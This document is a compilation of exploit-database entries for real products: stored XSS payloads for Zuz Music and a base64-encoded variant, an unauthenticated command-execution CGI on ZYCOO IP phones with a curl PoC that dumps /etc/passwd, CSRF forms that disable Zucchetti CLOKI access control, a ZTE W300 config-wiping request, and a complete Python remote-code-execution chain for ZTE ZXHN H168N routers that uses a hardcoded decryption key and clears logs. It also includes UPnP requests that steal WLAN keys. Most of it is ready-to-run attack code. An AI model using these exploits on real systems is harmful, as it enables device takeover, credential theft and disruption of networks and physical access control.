sanitized and it's possible to provoke some attacks.
In order to do the attack, you must create a new group and capture the
packet transferred to the server to modify it because validation is
done in client-side (only) using javascript.
The original request has three POST data parameters like:
popup=1 & name=dGVzdA%3D%3D & description=dGVzdA%3D%3D
Important data are 'name' and 'description' parameters, which are
base64 encoded. In this case, both values are 'test':
url_decode(dGVzdA%3D%3D)
b64decode(dGVzdA==)
test
It is possible to provoke the XSS by changing those values as follows:
"><script>alert("XSS attack")</script>
Values MUST be in base64, so:
b64encode(""><script>alert("XSS attack")</script>") =
Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4=
Finally the post-data of the request would become:
popup=1&name=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d&description=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d
Once the request has reached the server, a new group would be created
and any time that someone sees the name/description of the group, a
pop-up would appear, this is the easiest attack.
Vulnerable hardware : ZYCOO IP phone system
Vendor : zycoo.com
Author : Ahmed sultan (@0x4148)
Email : 0x4148@gmail.com
Summary : According to the vendor's site ,
CooVox Series IP Phone System is the most innovative solution for VoIP telecommunication in SMB (Small and Medium-sized Business) market.
They provide not only traditional PBX functions such as automated attendant and voicemail,
but also offer many advance telephony features, including remote extensions, remote office connection,
IVR, call recording, call detail records(CDR)…
Vulnerable file : /www/cgi-bin/system_cmd.cgi
Code shot :
#!/bin/hush
printf '\r\n'
if [ -n "$REQUEST_METHOD" ]; then
case "$REQUEST_METHOD" in
(GET)
if [ -n "$QUERY_STRING" ]; then
for args in `echo "$QUERY_STRING" | tr "&" " "`
do
param=`echo "$args" | cut -d "=" -f 1`
value=`echo "$args" | cut -d "=" -f 2`
eval "export $param=$value"
done
fi
;;
esac
fi
INI_FILE=/etc/asterisk/manager.conf
INI_SECTION=$username
eval `sed -e 's/[[:space:]]*\=[[:space:]]*/=/g' \
-e 's/;.*$//' \
-e 's/[[:space:]]*$//' \
-e 's/^[[:space:]]*//' \
-e "s/^\(.*\)=\([^\"']*\)$/\1=\'\2\'/" \
< $INI_FILE \
| sed -n -e "/^\[$INI_SECTION\]/,/^\s*\[/{/^[^;].*\=.*/p;}"`
password="`/etc/scripts/decodeURI $password`"
[ -z "$secret" ] && secret=`/etc/scripts/getkeyvalue.sh ${INI_SECTION} vmsecret`
if [ "$password" = "$secret" ]; then
cmd=`echo $cmd | sed 's/%20/ /g'`
# cmd=`echo $cmd | sed -e's/%\([0-9A-F][0-9A-F]\)/\\\\\x\1/g;s/?r//g' | xargs echo`
$cmd
the GET parameter cmd is freely available to directly execute system commands with no prior required authentication
which lead to full hardware takeover
POC
[0x4148:/R1z]# curl http://server:9999/cgi-bin/system_cmd.cgi\?cmd\='cat%20/etc/passwd'
root:$1$C6ouMLFa$pb2/Bu1bcWpBNcX38jTva0:0:0:root:/:/bin/sh
nobody:x:99:99:Nobody::
Also by reading file /etc/asterisk/manager.conf
hardware admin's password can be obtained in plain text
Fixing?
Unfortunately the hardware frontend really depend on this file , and the vendor is super lazy on replying on the emails regarding this vulnerability
so , best fixation for now is enabling the web interface browsing from the local network only
# Exploit Title: Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-site Scripting
# Google Dork: N/A
# Date: 14 Feb 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://zuz.host/
# Software Link: https://codecanyon.net/item/zuz-music-advance-music-platform-system/21633476
# Version: 2.1
# Tested on: WIN7_x68/Linux
# CVE : N/A
# Description:
----------------------
ZuzMusic 2.1 suffers from a persistent Cross-Site Scripting vulnerability.
# POC:
----------------------
1. Go To https://[PATH]/contact
2. There are three vulnerable parameters name, subject and message.
3. Inject the JavaScript code.
4. The Injected JavaScript code will be executed when the Administrator open the malicious message https://demos.zuz.host/gmusic/admin/inbox.
# Request:
----------------------
POST /gmusic/zuzconsole/___contact HTTP/1.1
Host: server
Connection: close
Content-Length: 155
Accept: application/json, text/plain, */*
Origin: https://demos.zuz.host
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: https://server/gmusic/contact
Accept-Encoding: gzip, deflate
X-XSS-Protection: 0
{"type":"general","name":"<script>alert(0)</script>","mail":"mail@example.com","subject":"<script>alert(1)</script>","message":"<script>alert(2)</script>"}
# Response:
----------------------
HTTP/1.1 200 OK
Date: Fri, 15 Feb 2019 01:30:19 GMT
Server: Apache
Connection: close
Content-Type: application/json
Content-Length: 183
{
"kind": "zuz#contactMessageSent",
"etag": "hnwdHsGYwqI6CCSoRSXDMG1BEDTbMMFrOcayLdTYeOs",
"message": "We have recieved your query and will get back to you in 24 hours."
}
source: https://www.securityfocus.com/bid/52720/info
FbiLike is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
FbiLike 1.00 is vulnerable; other versions may also be affected.
http://www.example.com/fbilike/like.php?id=[XSS]
# Exploit Title: Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF)
# Date: 13/12/2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.axesstmc.com/cloki/
<!--
Zucchetti Axess CLOKI Access Control 1.64 CSRF Disable Access Control
Vendor: Zucchetti Axess S.p.A.
Product web page: https://www.axesstmc.com
Affected version: 1.64
1.63
1.54
Summary: CLOKI is the pre-installed application on our terminals that
provides simple to use access control management and attendance monitoring
using any browser (IE, Chrome, Firefox, etc.). It is suited for anyone
looking for a stand-alone Access Control and Attendance Monitoring system
where the users' data is not frequently changed. Data management is simple
and intuitive and no additional software is needed on the PC intend to use
as WEB base. CLOKI for Access Control also allows configuration and monitoring
of access at all company entrances (doors, gates, turnstiles etc). The Access
Control manages any type of reader, entrance and access credential. Using an
impartial selector it is possible to check that employees do not take company
assets and allows registration of all accesses to the system and all operations
that users carry out.
Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. These
actions can be exploited to perform authentication detriment and account password
change with administrative privileges if a logged-in user visits a malicious web
site.
Tested on: Start X3 (h02 build 4163)
Start X1 (g01 build 2804)
X1/X2/X3/X4/X7 Web Server
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5689
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5689.php
13.11.2021
-->
CSRF disable AC:
----------------
<html>
<body>
<form action="http://10.0.0.2:8081/redirect.cgi">
<input type="hidden" name="flagAccessControlChanged" value="true" />
<input type="hidden" name="RAct" value="5" />
<input type="hidden" name="EnR" value="1" />
<input type="hidden" name="ExR" value="1" />
<input type="hidden" name="DenyRTout" value="5" />
<input type="hidden" name="DenyR" value="0" />
<input type="hidden" name="IType" value="0" />
<input type="hidden" name="E485" value="on" />
<input type="hidden" name="GType" value="0" />
<input type="hidden" name="TOO" value="50" />
<input type="hidden" name="TOC" value="50" />
<input type="hidden" name="TOOE" value="100" />
<input type="hidden" name="TOCE" value="100" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF enable AC:
---------------
<html>
<body>
<form action="http://10.0.0.2:8081/redirect.cgi">
<input type="hidden" name="flagAccessControlChanged" value="true" />
<input type="hidden" name="ACtrl" value="on" />
<input type="hidden" name="RAct" value="5" />
<input type="hidden" name="EnR" value="1" />
<input type="hidden" name="ExR" value="1" />
<input type="hidden" name="DenyRTout" value="5" />
<input type="hidden" name="DenyR" value="0" />
<input type="hidden" name="IType" value="0" />
<input type="hidden" name="E485" value="on" />
<input type="hidden" name="GType" value="0" />
<input type="hidden" name="TOO" value="50" />
<input type="hidden" name="TOC" value="50" />
<input type="hidden" name="TOOE" value="100" />
<input type="hidden" name="TOCE" value="100" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Document Title:
===============
ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1522
Release Date:
=============
2015-06-16
Vulnerability Laboratory ID (VL-ID):
====================================
1522
Common Vulnerability Scoring System:
====================================
6
Product & Service Introduction:
===============================
ZTE zxv10 w300 ADSL wireless router cat family gateway (accessories include a host, a power line, a line of 1 root, separator, 1)
(Copy of the Vendor Homepage: http://wwwen.zte.com.cn/en/products/access/cpe/201302/t20130204_386351.html )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a remote vulnerability in the official ZTE Corporation ZXV10 W300 v3.1.0c_DR0 modem hardware.
Vulnerability Disclosure Timeline:
==================================
2015-06-16: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
ZTE Corporation
Product: ZTE ZXV10 W300 3.1.0c_DR0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A session vulnerability has been discovered in the official ZTE Corporation ZXV10 W300 v3.1.0c_DR0 modem hardware.
The security vulnerability allows remote attackers to block/shutedown or delete network settings and components.
The LAN configuration post to /Forms/home_lan_1 and the page /home_lan_1 that stores the configuration of the router.
Attackers can request via GET method the /Forms/home_lan_1 path and the modem will delete all the LAN configurations automatically.
The problem is the GET method request with the /Forms/home_lan_1 path that deletes all the configurations. A hard reset is required
after successful exploitation of the issue.
The security risk of the router ui web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.0.
Exploitation of the security web vulnerability requires no privilege web-application user account and low user interaction (click link).
Successful exploitation of the vulnerability results in reset of the modem device, shutdown of the network/lan or compromise of running services.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Forms/
Affected Module(s):
[+] home_lan_1
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privilege application user account and low user interaction (click).
For security demonstration or to reproduce follow the provided information and steps below to continue.
--- PoC Session Logs [GET] ---
13:18:35.526[0ms][total 0ms]
Status: pending[]
GET http://192.168.1.1/Forms/home_lan_1
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[192.168.1.1]
User-Agent[Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
X-Forwarded-For[8.8.8.8]
Connection[keep-alive]
Authorization[Basic YWRtaW46YWRtaW4=]
Note: The victim with needs to click to perform only the GET method request with non expired session to execute!
Reference(s):
http://localhost/Forms/home_lan_1
Security Risk:
==============
The security risk of the remote vulnerability in the interface service is estimated as high. (CVSS 6.0)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
# Exploit Title: ZTE ZXHN H168N 3.1 - RCE via authentication bypass
# Author: l34n / tasos meletlidis
# Exploit Blog: https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/
import http.client, requests, os, argparse, struct, zlib
from io import BytesIO
from os import stat
from Crypto.Cipher import AES
def login(host, port, username, password):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"Username": username,
"Password": password,
"Frm_Logintoken": "",
"action": "login"
}
requests.post(f"http://{host}:{port}/", headers=headers, data=data)
def logout(host, port):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_LogOff": "1",
"IF_LanguageSwitch": "",
"IF_ModeSwitch": ""
}
requests.post(f"http://{host}:{port}/", headers=headers, data=data)
def leak_config(host, port):
conn = http.client.HTTPConnection(host, port)
boundary = "---------------------------25853724551472601545982946443"
body = (
f"{boundary}\r\n"
'Content-Disposition: form-data; name="config"\r\n'
"\r\n"
"\r\n"
f"{boundary}--\r\n"
)
headers = {
"Content-Type": f"multipart/form-data; boundary={boundary}",
"Content-Length": str(len(body)),
"Connection": "keep-alive",
}
conn.request("POST", "/getpage.lua?pid=101&nextpage=ManagDiag_UsrCfgMgr_t.lp", body, headers)
response = conn.getresponse()
response_data = response.read()
with open("config.bin", "wb") as file:
file.write(response_data)
conn.close()
def _read_exactly(fd, size, desc="data"):
chunk = fd.read(size)
if len(chunk) != size:
return None
return chunk
def _read_struct(fd, fmt, desc="struct"):
size = struct.calcsize(fmt)
data = _read_exactly(fd, size, desc)
if data is None:
return None
return struct.unpack(fmt, data)
def read_aes_data(fd_in, key):
encrypted_data = b""
while True:
aes_hdr = _read_struct(fd_in, ">3I", desc="AES chunk header")
if aes_hdr is None:
return None
_, chunk_len, marker = aes_hdr
chunk = _read_exactly(fd_in, chunk_len, desc="AES chunk data")
if chunk is None:
return None
encrypted_data += chunk
if marker == 0:
break
cipher = AES.new(key.ljust(16, b"\0")[:16], AES.MODE_ECB)
fd_out = BytesIO()
fd_out.write(cipher.decrypt(encrypted_data))
fd_out.seek(0)
return fd_out
def read_compressed_data(fd_in, enc_header):
hdr_crc = zlib.crc32(struct.pack(">6I", *enc_header[:6]))
if enc_header[6] != hdr_crc:
return None
total_crc = 0
fd_out = BytesIO()
while True:
comp_hdr = _read_struct(fd_in, ">3I", desc="compression chunk header")
if comp_hdr is None:
return None
uncompr_len, compr_len, marker = comp_hdr
chunk = _read_exactly(fd_in, compr_len, desc="compression chunk data")
if chunk is None:
return None
total_crc = zlib.crc32(chunk, total_crc)
uncompressed = zlib.decompress(chunk)
if len(uncompressed) != uncompr_len:
return None
fd_out.write(uncompressed)
if marker == 0:
break
if enc_header[5] != total_crc:
return None
fd_out.seek(0)
return fd_out
def read_config(fd_in, fd_out, key):
ver_header_1 = _read_struct(fd_in, ">5I", desc="1st version header")
if ver_header_1 is None:
return
ver_header_2_offset = 0x14 + ver_header_1[4]
fd_in.seek(ver_header_2_offset)
ver_header_2 = _read_struct(fd_in, ">11I", desc="2nd version header")
if ver_header_2 is None:
return
ver_header_3_offset = ver_header_2[10]
fd_in.seek(ver_header_3_offset)
ver_header_3 = _read_struct(fd_in, ">2H5I", desc="3rd version header")
if ver_header_3 is None:
return
signed_cfg_size = ver_header_3[3]
file_size = stat(fd_in.name).st_size
fd_in.seek(0x80)
sign_header = _read_struct(fd_in, ">3I", desc="signature header")
if sign_header is None:
return
if sign_header[0] != 0x04030201:
return
sign_length = sign_header[2]
signature = _read_exactly(fd_in, sign_length, desc="signature")
if signature is None:
return
enc_header_raw = _read_exactly(fd_in, 0x3C, desc="encryption header")
if enc_header_raw is None:
return
encryption_header = struct.unpack(">15I", enc_header_raw)
if encryption_header[0] != 0x01020304:
return
enc_type = encryption_header[1]
if enc_type in (1, 2):
if not key:
return
fd_in = read_aes_data(fd_in, key)
if fd_in is None:
return
if enc_type == 2:
enc_header_raw = _read_exactly(fd_in, 0x3C, desc="second encryption header")
if enc_header_raw is None:
return
encryption_header = struct.unpack(">15I", enc_header_raw)
if encryption_header[0] != 0x01020304:
return
enc_type = 0
if enc_type == 0:
fd_in = read_compressed_data(fd_in, encryption_header)
if fd_in is None:
return
fd_out.write(fd_in.read())
def decrypt_config(config_key):
encrypted = open("config.bin", "rb")
decrypted = open("decrypted.xml", "wb")
read_config(encrypted, decrypted, config_key)
with open("decrypted.xml", "r") as file:
contents = file.read()
username = contents.split("IGD.AU2")[1].split("User")[1].split("val=\"")[1].split("\"")[0]
password = contents.split("IGD.AU2")[1].split("Pass")[1].split("val=\"")[1].split("\"")[0]
encrypted.close()
os.system("rm config.bin")
decrypted.close()
os.system("rm decrypted.xml")
return username, password
def change_log_level(host, port, log_level):
level_map = {
"critical": "2",
"notice": "5"
}
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "Apply",
"_BASICCONIG": "Y",
"LogEnable": "1",
"LogLevel": level_map[log_level],
"ServiceEnable": "0",
"Btn_cancel_LogManagerConf": "",
"Btn_apply_LogManagerConf": "",
"downloadlog": "",
"Btn_clear_LogManagerConf": "",
"Btn_save_LogManagerConf": "",
"Btn_refresh_LogManagerConf": ""
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
def change_username(host, port, new_username, old_password):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "Apply",
"_InstID": "IGD.AU2",
"Right": "2",
"Username": new_username,
"Password": old_password,
"NewPassword": old_password,
"NewConfirmPassword": old_password,
"Btn_cancel_AccountManag": "",
"Btn_apply_AccountManag": ""
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_AccountManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/accountManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/accountManag_lua.lua", headers=headers, data=data)
def clear_log(host, port):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "clearlog"
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
def refresh_log(host, port):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "Refresh"
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
def trigger_rce(host, port):
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_StatusManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2fuserlog.txt&Menu3Location=0")
def rce(cmd):
return f"<? _G.os.execute('rm /var/userlog.txt;{cmd}') ?>"
def pwn(config_key, host, port):
leak_config(host, port)
username, password = decrypt_config(config_key)
login(host, port, username, password)
shellcode = "echo \"pwned\""
payload = rce(shellcode)
change_username(host, port, payload, password)
refresh_log(host, port)
change_log_level(host, port, "notice")
refresh_log(host, port)
trigger_rce(host, port)
clear_log(host, port)
change_username(host, port, username, password)
change_log_level(host, port, "critical")
logout(host, port)
print("[+] PoC complete")
def main():
parser = argparse.ArgumentParser(description="Run remote command on ZTE ZXHN H168N V3.1")
parser.add_argument("--config_key", type=lambda x: x.encode(), default=b"GrWM3Hz<vz&f^9", help="Leaked config encryption key from cspd")
parser.add_argument("--host", required=True, help="Target IP address of the router")
parser.add_argument("--port", required=True, type=int, help="Target port of the router")
args = parser.parse_args()
pwn(args.config_key, args.host, args.port)
if __name__ == "__main__":
main()
[*] POC: (CVE-2018-7357 and CVE-2018-7358)
Disclaimer: [This POC is for Educational Purposes , I would Not be
responsible for any misuse of the information mentioned in this blog post]
[+] Unauthenticated
[+] Author: Usman Saeed (usman [at] xc0re.net)
[+] Protocol: UPnP
[+] Affected Harware/Software:
Model name: ZXHN H168N v2.2
Build Timestamp: 20171127193202
Software Version: V2.2.0_PK1.2T5
[+] Findings:
1. Unauthenticated access to WLAN password:
POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 288
Connection: close
Content-Type: text/xml; charset=”utf-8″
SOAPACTION: “urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys” 1
<?xml version=”1.0″ encoding=”utf-8″?>
<s:Envelope xmlns:s=”http://schemas.xmlsoap.org/soap/envelope/” s:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”><s:Body><u:GetSecurityKeys xmlns:u=”urn:dslforum-org:service:WLANConfiguration:1″></u:GetSecurityKeys></s:Body></s:Envelope>
2. Unauthenticated WLAN passphrase change:
POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 496
Connection: close
Content-Type: text/xml; charset=”utf-8″
SOAPACTION: “urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys”
<?xml version=”1.0″ encoding=”utf-8″?>
<s:Envelope xmlns:s=”http://schemas.xmlsoap.org/soap/envelope/” s:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”><s:Body><u:SetSecurityKeys xmlns:u=”urn:dslforum-org:service:WLANConfiguration:1″><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>
[*] Solution:
UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.
[*] Note:
There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.
[+] Responsible Disclosure:
Vulnerabilities identified – 20 August, 2018
Reported to ZTE – 28 August, 2018
ZTE official statement – 17 September 2018
ZTE patched the vulnerability – 12 November 2018
The operator pushed the update – 12 November 2018
CVE published – Later
Public disclosure – 12 November 2018
Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522